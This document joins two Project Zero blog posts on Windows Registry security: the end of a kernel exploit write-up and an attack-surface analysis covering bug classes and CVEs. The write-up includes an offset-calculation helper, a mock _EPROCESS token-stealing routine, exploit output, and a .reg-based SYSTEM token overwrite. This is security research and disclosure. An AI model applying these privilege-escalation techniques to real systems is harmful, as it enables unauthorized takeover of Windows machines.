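# cancels the trailing +4, so the result is exactly the chosen BlockOffset:
target = 0xFFFFF80350800004
assert hvp_get_cell_paged_result(0xFFFFFFFFFFFFFFF0, target, 0x8FE2900C) == target
```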

    An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂

    Step 4: Elevating process security token

    With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below.

    Diagram described above
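A runnable sketch of this walk against a mock flat memory model is shown below. The read_qword/write_qword primitives stand in for the registry-based kernel r/w, and the _EPROCESS field offsets are placeholders rather than values from any real build; only the System process's well-known PID of 4 is taken as given:

```python
memory = {}  # mock kernel memory: address -> 64-bit value

def read_qword(addr):
    return memory[addr]

def write_qword(addr, value):
    memory[addr] = value

# Placeholder _EPROCESS field offsets (build-specific in reality):
OFF_PID = 0x440    # UniqueProcessId
OFF_LINKS = 0x448  # ActiveProcessLinks.Flink
OFF_TOKEN = 0x4B8  # Token

def steal_token(list_head, my_pid):
    """Walk the circular _EPROCESS list starting at the head, locate the
    System process (PID 4) and our own process, and copy the token over."""
    system_token = my_process = None
    links = read_qword(list_head)  # head's Flink
    while links != list_head:
        eprocess = links - OFF_LINKS
        pid = read_qword(eprocess + OFF_PID)
        if pid == 4:
            system_token = read_qword(eprocess + OFF_TOKEN)
        elif pid == my_pid:
            my_process = eprocess
        links = read_qword(links)  # follow Flink to the next entry
    write_qword(my_process + OFF_TOKEN, system_token)

# Demo: a two-process list (System and a PID-1234 process) hanging off a head.
HEAD, P_SYS, P_ME = 0x1000, 0x10000, 0x20000
for base, pid, token, nxt in ((P_SYS, 4, 0xAAAA, P_ME + OFF_LINKS),
                              (P_ME, 1234, 0xBBBB, HEAD)):
    write_qword(base + OFF_PID, pid)
    write_qword(base + OFF_TOKEN, token)
    write_qword(base + OFF_LINKS, nxt)
write_qword(HEAD, P_SYS + OFF_LINKS)

steal_token(HEAD, my_pid=1234)
assert read_qword(P_ME + OFF_TOKEN) == 0xAAAA  # our process now has System's token
```

In the real exploit, each of these reads and writes maps onto a RegSetValueEx call on KernelAddr followed by a RegQueryValueEx or RegSetValueEx call on KernelData.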

    This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows:

    C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg

    [+] Found kernel base address: fffff80350800000

    [+] Spawning a command prompt...

    [+] Found PID 6892 at address ffff8107b3864080

    [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943

    [+] Exploit succeeded, enjoy!

    C:\Users\user\Desktop\exploits>

    Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges:

    It works!

    As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation:

    Final thoughts

    Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken:

    A flowchart illustrating a multi-step attack chain leading to privilege escalation. The process begins with “Hive memory corruption”, which leads to “Construction of a controlled registry value”. This enables “Disabling the cell index bounds check”, followed by a “Kernel image base leak”. The leak is then used for “Construction of self-referential values for arbitrary kernel r/w” (read/write), ultimately resulting in “Privilege escalation by stealing the system token”.

    To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.

    Exploit mitigations

    The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical.

    Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.

    False File Immutability

    So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open.

As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over the underlying storage. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed.

    However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.

    Conclusion

Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write-ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!


    The Windows Registry Adventure #7: Attack surface analysis

May 23, 2025, 06:05

    Posted by Mateusz Jurczyk, Google Project Zero

    In the first three blog posts of this series, I sought to outline what the Windows Registry actually is, its role, history, and where to find further information about it. In the subsequent three posts, my goal was to describe in detail how this mechanism works internally – from the perspective of its clients (e.g., user-mode applications running on Windows), the regf format used to encode hives, and finally the kernel itself, which contains its canonical implementation. I believe all these elements are essential for painting a complete picture of this subsystem, and in a way, it shows my own approach to security research. One could say that going through this tedious process of getting to know the target unnecessarily lengthens the total research time, and to some extent, they would be right. On the other hand, I believe that to conduct complete research, it is equally important to answer the question of how certain things are implemented, as well as why they are implemented that way – and the latter part often requires a deeper dive into the subject. And since I have already spent the time reverse engineering and understanding various internal aspects of the registry, there are great reasons to share the information with the wider community. There is a lack of publicly available materials on how various mechanisms in the registry work, especially the most recent and most complicated ones, so I hope that the knowledge I have documented here will prove useful to others in the future.

    In this blog post, we get to the heart of the matter, the actual security of the Windows Registry. I'd like to talk about what made a feature that was initially meant to be just a quick test of my fuzzing infrastructure draw me into manual research for the next 1.5 ~ 2 years, and result in Microsoft fixing (so far) 53 CVEs. I will describe the various areas that are important in the context of low-level security research, from very general ones, such as the characteristics of the codebase that allow security bugs to exist in the first place, to more specific ones, like all possible entry points to attack the registry, the impact of vulnerabilities and the primitives they generate, and some considerations on effective fuzzing and where more bugs might still be lurking.

    Let's start with a quick recap of the registry's most fundamental properties as an attack surface:

    • Local attack surface for privilege escalation: As we already know, the Windows Registry is a strictly local attack surface that can potentially be leveraged by a less privileged process to gain the privileges of a higher privileged process or the kernel. It doesn't have any remote components except for the Remote Registry service, which is relatively small and not accessible from the Internet on most Windows installations.
    • Complex, old codebase in a memory-unsafe language: The Windows Registry is a vast and complex mechanism, entirely written in C, most of it many years ago. This means that both logic and memory safety bugs are likely to occur, and many such issues, once found, would likely remain unfixed for years or even decades.
    • Present in the core NT kernel: The registry implementation resides in the core Windows kernel executable (ntoskrnl.exe), which means it is not subject to mitigations like the win32k lockdown. Of course, the reachability of each registry bug needs to be considered separately in the context of specific restrictions (e.g., sandbox), as some of them require file system access or the ability to open a handle to a specific key. Nevertheless, being an integral part of the kernel significantly increases the chances that a given bug can be exploited.
    • Most code reachable by unprivileged users: The registry is a feature that was created for use by ordinary user-mode applications. It is therefore not surprising that the vast majority of registry-related code is reachable without any special privileges, and only a small part of the interface requires administrator rights. Privilege escalation from medium IL (Integrity Level) to the kernel is probably the most likely scenario of how a registry vulnerability could be exploited.
    • Manages sensitive information: In addition to the registry implementation itself being complex and potentially prone to bugs, it's important to remember that the registry inherently stores security-critical system information, including various global configurations, passwords, user permissions, and other sensitive data. This means that not only low-level bugs that directly allow code execution are a concern, but also data-only attacks and logic bugs that permit unauthorized modification or even disclosure of registry keys without proper permissions.
    • Not trivial to fuzz, and not very well documented: Overall, it seems that the registry is not a very friendly target for bug hunting without any knowledge of its internals. At the same time, obtaining that information is not easy either, especially for the latest registry mechanisms, which are not publicly documented and learning about them basically boils down to reverse engineering. In other words, the barrier to entry in this area is quite high, which can be an advantage or a disadvantage depending on the time and commitment of a potential researcher.

    Security properties

    The above cursory analysis seems to indicate that the registry may be a good audit target for someone interested in EoP bugs on Windows. Let's now take a closer look at some of the specific low-level reasons why the registry has proven to be a fruitful research objective.

    Broad range of bug classes

    Due to the registry being both complex and a central mechanism in the system operating with kernel-mode privileges, numerous classes of bugs can occur within it. An example vulnerability classification is presented below:

    • Hive memory corruption: Every invasive operation performed on the registry (i.e., a "write" operation) is reflected in changes made to the memory-mapped view of the hive's structure. Considering that objects within the hive include variable-length arrays, structures with counted references, and references to other cells via cell indexes (hives' equivalent of memory pointers), it's natural to expect common issues like buffer overflows or use-after-frees.
    • Pool memory corruption: In addition to hive memory mappings, the Configuration Manager also stores a significant amount of information on kernel pools. Firstly, there are cached copies of certain hive data, as described in my previous blog post. Secondly, there are various auxiliary objects, such as those allocated and subsequently released within a single system call. Many of these objects can fall victim to memory management bugs typical of the C language.
    • Information disclosure: Because the registry implementation is part of the kernel, and it exchanges large amounts of information with unprivileged user-mode applications, it must be careful not to accidentally disclose uninitialized data from the stack or kernel pools to the caller. This can happen both through output data copied to user-mode memory and through other channels, such as data leakage to a file (hive file or related log file). Therefore, it is worthwhile to keep an eye on whether all arrays and dynamically allocated buffers are fully populated or carefully filled with zeros before passing them to a lower-privileged context.
    • Race conditions: As a multithreaded environment, Windows allows for concurrent registry access by multiple threads. Consequently, the registry implementation must correctly synchronize access to all shared kernel-side objects and be mindful of "double fetch" bugs, which are characteristic of user-mode client interactions.
    • Logic bugs: In addition to being memory-safe and free of low-level bugs, a secure registry implementation must also enforce correct high-level security logic. This means preventing unauthorized users from accessing restricted keys and ensuring that the registry operates consistently with its documentation under all circumstances. This requires a deep understanding of both the explicit documentation and the implicit assumptions that underpin the registry's security from the kernel developers. Ultimately, any behavior that deviates from expected logic, whether documented or assumed, could lead to vulnerabilities.
    • Inter-process attacks: The registry can serve as a security target, but also as a means to exploit flaws in other applications on the system. It is a shared database, and a local attacker has many ways to indirectly interact with more privileged programs and services. A simple example is when privileged code sets overly permissive permissions on its keys, allowing unauthorized reading or modification. More complex cases can occur when there is a race condition between key creation and setting its restricted security descriptor, or when a key modification involving several properties is not performed transactionally, potentially leading to an inconsistent state. The specifics depend on how the privileged process uses the registry interface.

    If I were to depict the Windows Registry in a single Venn diagram, highlighting its various possible bug classes, it might look something like this:

    A Venn diagram illustrates the intersection of different bug categories within the Windows Registry. Four overlapping circles represent Kernel-specific bugs, File parsing bugs, Object lifetime bugs, and Logic bugs. The central area where all circles overlap is highlighted, indicating vulnerabilities that combine all these bug types.

    Manual reference counting

    As I have mentioned multiple times, security descriptors in registry hives are shared by multiple keys, and therefore, must be reference counted. The field responsible for this is a 32-bit unsigned integer, and any situation where it's set to a value lower than the actual number of references can result in the release of that security descriptor while it's still in use, leading to a use-after-free condition and hive-based memory corruption. So, we see that it's absolutely critical that this refcounting is implemented correctly, but unfortunately, there are (or were until recently) many reasons why this mechanism could be prone to bugs:

    • Usually, a reference count is a construct that exists strictly in memory, where it is initialized with a value of 1, then incremented and decremented some number of times, and finally drops to zero, causing the object to be freed. However, with registry hives, the initial refcount values are loaded from disk, from a file that we assume is controlled by the attacker. Therefore, these values cannot be trusted in any way, and the first necessary step is to actually compare and potentially adjust them according to the true number of references to each descriptor. Even though this is done in theory, bugs can creep into this logic in practice (CVE-2022-34707, CVE-2023-38139).
    • For a long time, all operations on reference counts were performed by directly referencing the _CM_KEY_SECURITY.ReferenceCount field, instead of using a secure wrapper. As a result, none of these incrementations were protected against integer overflow. This meant that not only a too small, but also a too large refcount value could eventually overflow and lead to a use-after-free situation (CVE-2023-28248, CVE-2024-43641). This weakness was gradually addressed in various places in the registry code between April 2023 and November 2024. Currently, all instances of refcount incrementation appear to be secure and involve calling the special helper function CmpKeySecurityIncrementReferenceCount, which protects against integer overflow. Its counterpart for refcount decrementation is CmpKeySecurityDecrementReferenceCount.
    • It seems that there is a lack of clarity and understanding of how certain special types of keys, such as predefined keys and tombstone keys, behave in relation to security descriptors. In theory, the only type of key that does not have a security descriptor assigned to it is the exit node (i.e., a key with the KEY_HIVE_EXIT flag set, found solely in the virtual hive rooted at \Registry\), while all other keys do have a security descriptor assigned to them, even if it is not used for anything. In practice, however, there have been several vulnerabilities in Windows that resulted either from incorrect security refresh in KCB for special types of keys (CVE-2023-21774), from releasing the security descriptor of a predefined key without considering its reference count (CVE-2023-35356), or from completely forgetting the need for reference counting the descriptors of tombstone keys in the "rename" operation (CVE-2023-35382).
    • When the reference count of a security descriptor reaches zero and is released, this operation is irreversible. There is no guarantee that upon reallocation, the descriptor would have the same cell index, or even that it could be reallocated at all. This is crucial for multi-step operations where individual actions could fail, necessitating a full rollback to the original state. Ideally, releasing security descriptors should always be the final step, only when the kernel can be certain that the entire operation will succeed. A vulnerability exemplifying this is CVE-2023-21772, where the registry virtualization code first released the old security descriptor and then attempted to allocate a new one. If the allocation failed, the key was left without any security properties, violating a fundamental assumption of the registry and potentially having severe consequences for system memory safety.

    Aggressive self-healing and recovery

    As I described in blog post #5, one of the registry's most interesting features, which distinguishes it from many other file format implementations, is that it is self-healing. The entire hive loading process, from the internal CmCheckRegistry function downwards, is focused on loading the database at all costs, even if some corrupted fragments are encountered. Only if the file damage is so extensive that recovering any data is impossible does the entire loading process fail. Of course, given that the registry stores critical system data such as its basic configuration, and the lack of access to this data virtually prevents Windows from booting, this decision made a lot of sense from the system reliability point of view. It's probably safe to assume that it has prevented the need for system reinstallation on numerous computers, simply because it did not reject hives with minor damage that might have appeared due to random hardware failure.

    However, from a security perspective, this behavior is not necessarily advantageous. Firstly, it seems obvious that upon encountering an error in the input data, it is simpler to unconditionally halt its processing rather than attempt to repair it. In the latter case, it is possible for the programmer to overlook an edge case – forget to reset some field in some structure, etc. – and thus instead of fixing the file, allow for another unforeseen, inconsistent state to materialize within it. In other words, the repair logic constitutes an additional attack surface, and one that is potentially even more interesting and error-prone than other parts of the implementation. A classic example of a vulnerability associated with this property is CVE-2023-38139.

    Secondly, in my view, the existence of this logic may have negatively impacted the secure development of the registry code, perhaps by leading to a discrepancy between what it guaranteed and what other developers thought it had guaranteed. For example, in 1991–1993, when the foundations of the Configuration Manager subsystem were being created in their current form, probably no one considered hive loading a potential attack vector. At that time, the registry was used only to store system configuration, and controlled hive loading was privileged and required admin rights. Therefore, I suspect that the main goal of hive checking at that time was to detect simple data inconsistencies due to hardware problems, such as single bit flips. No one expected a hive to contain a complex, specially crafted multi-kilobyte data structure designed to trigger a security flaw. Perhaps the rest of the registry code was written under the assumption that since data sanitization and self-healing occurred at load time, its state was safe from that point on and no further error handling was needed (except for out-of-memory errors). Then, in Windows Vista, a decision was made to open access to controlled hive loading by unprivileged users through the app hive mechanism, and it suddenly turned out that the existing safeguards were not entirely adequate. Attackers now became able to devise data constructs that were structurally correct at the low level, but completely beyond the scope of what the actual implementation expected and could handle.

    Finally, self-healing can adversely affect system security by concealing potential registry bugs that could trigger during normal Windows operation. These problems might only become apparent after a period of time and with a "build-up" of enough issues within the hive. Because hives are mapped into memory, and the kernel operates directly on the data within the file, there exists a category of errors known as "inconsistent hive state". This refers to a data structure within the hive that doesn't fully conform to the file format specification. The occurrence of such an inconsistency is noteworthy in itself and, for someone knowledgeable about the registry, it could be a direct clue for finding vulnerabilities. However, such instances rarely cause an immediate system crash or other visible side effects. Consider security descriptors and their reference counting: as mentioned earlier, any situation where the active number of references exceeds the reference count indicates a serious security flaw. However, even if this were to happen during normal system operation, it would require all other references to that descriptor to be released and then for some other data to overwrite the freed descriptor. Then, a dangling reference would need to be used to access the descriptor. The occurrence of all these factors in sequence is quite unlikely, and the presence of self-healing further decreases these chances, as the reference count would be restored to its correct value at the next hive load. This characteristic can be likened to wrapping the entire registry code in a try/except block that catches all exceptions and masks them from the user. This is certainly helpful in the context of system reliability, but for security, it means that potential bugs are harder to spot during system run time and, for the same reason, quite difficult to fuzz. This does not mean that they don't exist; their detection just becomes more challenging.

    Unclear boundaries between hard and conventional format requirements

    This point is related to the previous section. In the regf format, there are certain requirements that are fairly obvious and must be always met for a file to be considered valid. Likewise, there are many elements that are permitted to be formatted arbitrarily, at the discretion of the format user. However, there is a third category, a gray area of requirements that seem reasonable and probably would be good if they were met, but it is not entirely clear whether they are formally required. Another way to describe this set of states is one that is not generated by the Windows kernel itself but is still not obviously incorrect. From a researcher's perspective, it would be worthwhile to know which parts of the format are actually required by the specification and which are only a convention adopted by the Windows code.

    We might never find out, as Microsoft hasn't published an official format specification and it seems unlikely that they will in the future. The only option left for us is to rely on the implementation of the CmpCheck* functions (CmpCheckKey, CmpCheckValueList, etc.) as a sort of oracle and assume that everything there is enforced as a hard requirement, while all other states are permissible. If we go down this path, we might be in for a big surprise, as it turns out that there are many logical-sounding requirements that are not enforced in practice. This could allow user-controlled hives to contain constructs that are not obviously problematic, but are inconsistent with the spirit of the registry and its rules. In many cases, they allow encoding data in a less-than-optimal way, leading to unexpected redundancy. Some examples of such constructs are presented below:

    • Values with duplicate names within a single key: Under normal conditions, only one value with a given name can exist in a key, and if there is a subsequent write to the same name, the new data is assigned to the existing value. However, the uniqueness of value names is not required in input hives, and it is possible to load a hive with duplicate values.
    • Duplicate identical security descriptors within a single hive: Similar to the previous point, it is assumed that security descriptors within a hive are unique, and if an existing descriptor is assigned to another key, its reference count is incremented rather than allocating a new object. However, there is no guarantee that a specially crafted hive will not contain multiple duplicates of the same security descriptor, and this is accepted by the loader.
    • Uncompressed key names consisting solely of ASCII characters: Under normal circumstances, if a given key has a name comprising only ASCII characters, it will always be stored in a compressed form, i.e., by writing two bytes of the name in each element of the _CM_KEY_NODE.Name array of type uint16, and setting the KEY_COMP_NAME flag (0x20) in _CM_KEY_NODE.Flags. However, once again, optimal representation of names is not required when loading the hive, and this convention can be ignored without issue.
    • Allocated but unused cells: The Windows registry implementation deallocates objects within a hive when they are no longer needed, making space for new data. However, the loader does not require every cell marked "allocated" to be actively used. Similarly, security descriptors with a reference count of zero are typically deallocated. However, until a November 2024 refactor of the CmpCheckAndFixSecurityCellsRefcount function, it was possible to load a hive with unused security descriptors still present in the linked list. This behavior has since been changed, and unused security descriptors encountered during loading are now automatically freed and removed from the list.

    These examples illustrate the issue well, but none of them (as far as I know) have particularly significant security implications. However, there were also a few specific memory corruption vulnerabilities that stemmed from the fact that the registry code made theoretically sound assumptions about the hive structure, but they were not enforced by the loader:

    • CVE-2022-37988: This bug is closely related to the fact that cells larger than 16 KiB are aligned to the nearest power of two in Windows, but this condition doesn't need to be satisfied during loading. This caused the shrinking of a cell to fail, even though it should always succeed in-place, "surprising" the client of the allocator and resulting in a use-after-free condition.
    • CVE-2022-37956: As I described in blog post #5, Windows has some logic to ensure that no leaf-type subkey list (li, lf, or lh) exceeds 511 or 1012 elements, depending on its specific type. If a list is expanded beyond this limit, it is automatically split into two lists, each half the original length. Another reasonable assumption is that the root index length would never approach the maximum value of _CM_KEY_INDEX.Count (uint16) under normal circumstances. This would require an unrealistically large number of subkeys or a very specific sequence of millions of key creations and deletions with specific names. However, it was possible to load a hive containing a subkey list of any of the four types with a length equal to 0xFFFF, and trigger a 16-bit integer overflow on the length field, leading to memory corruption. Interestingly, this is one of the few bugs that could be triggered solely with a single .bat file containing a long sequence of the reg.exe command executions.
    • CVE-2022-38037: In this case, the kernel code assumed that the hive version defined in the header (_HBASE_BLOCK.Minor) always corresponded to the type of subkey lists used in a given hive. For example, if the file version is regf 1.3, it should be impossible for it to contain lists in a format introduced in version 1.5. However, for some reason, the hive loader doesn't enforce the proper relationship between the format version and the structures used in it, which in this case led to a serious hive-based memory corruption vulnerability.

    As we can see, it is crucial to differentiate between format elements that are conventions adopted by a specific implementation, and those actually enforced during the processing of the input file. If we encounter some code that makes assumptions from the former group that don't belong to the latter one, this could indicate a serious security issue.

    Susceptibility to mishandling OOM conditions

    Generally speaking, the implementation of any function in the Windows kernel is built roughly according to the following scheme:

    NTSTATUS NtHighLevelOperation(...) {
      NTSTATUS Status;

      Status = HelperFunction1(...);
      if (!NT_SUCCESS(Status)) {
        //
        // Clean up...
        //
        return Status;
      }

      Status = HelperFunction2(...);
      if (!NT_SUCCESS(Status)) {
        //
        // Clean up...
        //
        return Status;
      }

      //
      // More calls...
      //
      return STATUS_SUCCESS;
    }


    Of course, this is a significant simplification, as real-world code contains keywords and constructs such as if statements, switch statements, various loops, and so on. The key point is that a considerable portion of higher-level functions call internal, lower-level functions specialized for specific tasks. Handling potential errors signalled by these functions is an important aspect of kernel code (or any code, for that matter). In low-level Windows code, error propagation occurs using the NTSTATUS type, which is essentially a signed 32-bit integer. A value of 0 signifies success (STATUS_SUCCESS), positive values indicate success but with additional information, and negative values denote errors. The sign of the number is checked by the NT_SUCCESS macro. During my research, I dedicated significant time to analyzing the error handling logic. Let's take a moment to think about the types of errors that could occur during registry operations, and the conditions that might cause them.

    A common trait of all actions that modify data in the registry is that they allocate memory. The simplest example is the allocation of auxiliary buffers from kernel pools, requested through functions from the ExAllocatePool group. If there is very little available memory at a given point in time, one of the allocation requests may return the STATUS_INSUFFICIENT_RESOURCES error code, which will be propagated back to the original caller. And since we assume that we take on the role of a local attacker who has the ability to execute code on the machine, artificially occupying all available memory is potentially possible in many ways. So this is one way to trigger errors while performing operations on the registry, but admittedly not an ideal way, as it largely depends on the amount of RAM and the maximum pagefile size. Additionally, in a situation where the kernel has so little memory that single allocations start to fail, there is a high probability of the system crashing elsewhere before the vulnerability is successfully exploited. And finally, if several allocations are requested in nearby code in a short period of time, it seems practically impossible to take precise control over which of them will succeed and which will not.

    Nonetheless, the overall concept of out-of-memory conditions is a very promising avenue for attack, especially considering that the registry primarily operates on memory-mapped hives using its own allocator, in addition to objects from kernel pools. The situation is even more favorable for an attacker due to the 2 GiB size limitation of each of the two storage types (stable and volatile) within a hive. While this is a relatively large value, it is achievable to occupy it in under a minute on today's machines. The situation is even easier if it is the volatile space that needs to be occupied, as it resides solely in memory and is not flushed to disk – so filling two gigabytes of memory is then a matter of seconds. It can be accomplished, for example, by creating many long registry values, which is a straightforward task when dealing with a controlled hive. However, even in system hives, this is often feasible. To perform data spraying on a given hive, we only need a single key granting us write permissions. For instance, both HKLM\Software and HKLM\System contain numerous keys that allow write access to any user in the system, effectively permitting them to fill it to capacity. Additionally, the "global registry quota" mechanism, implemented by the internal CmpClaimGlobalQuota and CmpReleaseGlobalQuota functions, ensures that the total memory occupied by registry data in the system does not exceed 4 GiB. Besides filling the entire space of a specific hive, exhausting this global quota is thus another way to trigger out-of-memory conditions in the registry, especially when targeting a hive without write permissions. A concrete example where this mechanism could have been employed to corrupt the HKLM\SAM system hive is the CVE-2024-26181 vulnerability.

    Considering all this, it is a fair assumption that a local attacker can cause any call to ExAllocatePool*, HvAllocateCell, and HvReallocateCell (with a length greater than the existing cell) to fail. This opens up a large number of potential error paths to analyze. The HvAllocateCell calls are a particularly interesting starting point for analysis, as there are quite a few of them and almost all of them belong to the attack surface accessible to a regular user:

    A screenshot shows a debugger window titled xrefs to HvAllocateCell. The window lists numerous functions and their memory addresses under columns Direction, Type, Address, and Text. Nearly all entries show different system functions making a call to HvAllocateCell.

    There are two primary reasons why focusing on the analysis of error paths can be a good way to find security bugs. First, it stands to reason that on regular computers used by users, it is extremely rare for a given hive to grow to 2 GiB and run out of space, or for all registry data to simultaneously occupy 4 GiB of memory. This means that these code paths are practically never executed under normal conditions, and even if there were bugs in them, there is a very small chance that they would ever be noticed by anyone. Such rarely executed code paths are always a real treat for security researchers.

    The second reason is that proper error handling in code is inherently difficult. Many operations involve numerous steps that modify the hive's internal state. If an issue arises during these operations, the registry code must revert all changes and restore the registry to its original state (at least from the macro-architectural perspective). This requires the developer to be fully aware of all changes applied so far when implementing each error path. Additionally, proper error handling must be considered during the initial design of the control flow as well, because some registry actions are irreversible (e.g., freeing cells). The code must thus be structured so that all such operations are placed at the very end of the logic, where errors cannot occur anymore and successful execution is guaranteed.

    One example of such a vulnerability is CVE-2023-23421, which boiled down to the following code:

    NTSTATUS CmpCommitRenameKeyUoW(_CM_KCB_UOW *uow) {
      // ...
      if (!CmpAddSubKeyEx(Hive, ParentKey, NewNameKey) ||
          !CmpRemoveSubKey(Hive, ParentKey, OldNameKey)) {
        CmpFreeKeyByCell(Hive, NewNameKey);
        return STATUS_INSUFFICIENT_RESOURCES;
      }
      // ...
    }


    The issue here was that if the CmpRemoveSubKey call failed, the corresponding error path should have reversed the effect of the CmpAddSubKeyEx function in the previous line, but in practice it didn't. As a result, it was possible to end up with a dangling reference to a freed key in the subkey list, which was a typical use-after-free condition.

    A second interesting example of this type of bug was CVE-2023-21747, where an out-of-memory error could occur during a highly sensitive operation, hive unloading. As there was no way to revert the state at the time of the OOM, the vulnerability was fixed by Microsoft by refactoring the CmpRemoveSubKeyFromList function and other related functions so that they no longer allocate memory from kernel pools and thus there is no longer a physical possibility of them failing.

    Finally, I'll mention CVE-2023-38154, where the problem wasn't incorrect error handling, but a complete lack of it – the return value of the HvpPerformLogFileRecovery function was ignored, even though there was a real possibility it could end with an error. This is a fairly classic type of bug that can occur in any programming language, but it's definitely worth keeping in mind when auditing the Windows kernel.

    Susceptibility to mishandling partial successes

    The previous section discusses bugs in error handling where each function is responsible for reversing the state it has modified. However, some functions don't adhere to this operational model. Instead of operating on an "all-or-nothing" basis, they work on a best-effort basis, aiming to accomplish as much of a given task as possible. If an error occurs, they leave any changes made in place, e.g., because this result is still preferable to not making any changes. This introduces a third possible output state for such functions: complete success, partial success, and complete failure.

    This might be problematic, as the approach is incompatible with the typical usage of the NTSTATUS type, which is best suited for conveying one of two (not three) states. In theory, it is a 32-bit integer type, so it could store the additional information of the status being a partial success, and not being unambiguously positive or negative. In practice, however, the convention is to directly propagate the last error encountered within the inner function, and the outer functions very rarely "dig into" specific error codes, instead assuming that if NT_SUCCESS returns FALSE, the entire operation has failed. Such confusion at the cross-function level may have security implications if the outer function should take some additional steps in the event of a partial success of the inner function, but due to the binary interpretation of the returned error code, it ultimately does not execute them.

    A classic example of such a bug is CVE-2024-26182, which occurred at the intersection of the CmpAddSubKeyEx (outer) and CmpAddSubKeyToList (inner) functions. The problem here was that CmpAddSubKeyToList implements complex, potentially multi-step logic for expanding the subkey list, which could perform a cell reallocation and subsequently encounter an OOM error. On the other hand, the CmpAddSubKeyEx function assumed that the cell index in the subkey list should only be updated in the hive structures if CmpAddSubKeyToList fully succeeds. As a result, the partial success of CmpAddSubKeyToList could lead to a classic use-after-free situation. An attentive reader will probably notice that the return value type of the CmpAddSubKeyToList routine was BOOL and not NTSTATUS, but the bug pattern is identical.

    Overall complexity introduced over time

    One of the biggest problems with the modern implementation of the registry is that over the decades of developing this functionality, many changes and new features have been introduced. This has caused the level of complexity of its internal state to increase so much that it seems difficult to grasp for one person, unless they are a registry expert who has worked on it full-time over a period of months or years. I personally believe that the registry existed in its most elegant form somewhere around Windows NT 3.1 – 3.51 (i.e. in the years 1993–1996). At the time, the mechanism was intuitive and logical for both developers and its users. Each object (key, value) either existed or not, each operation ended in either success or failure, and when it was requested on a particular key, you could be sure that it was actually performed on that key. Everything was simple, and black and white. However, over time, more and more shades of gray were continuously added, departing from the basic assumptions:

    • The existence of predefined keys meant that every operation could no longer be performed on every key, as this special type of key was unsafe for many internal registry functions to use due to its altered semantics.
    • Due to symbolic links, opening a specific key doesn't guarantee that it will be the intended one, as it might be a different key that the original one points to.
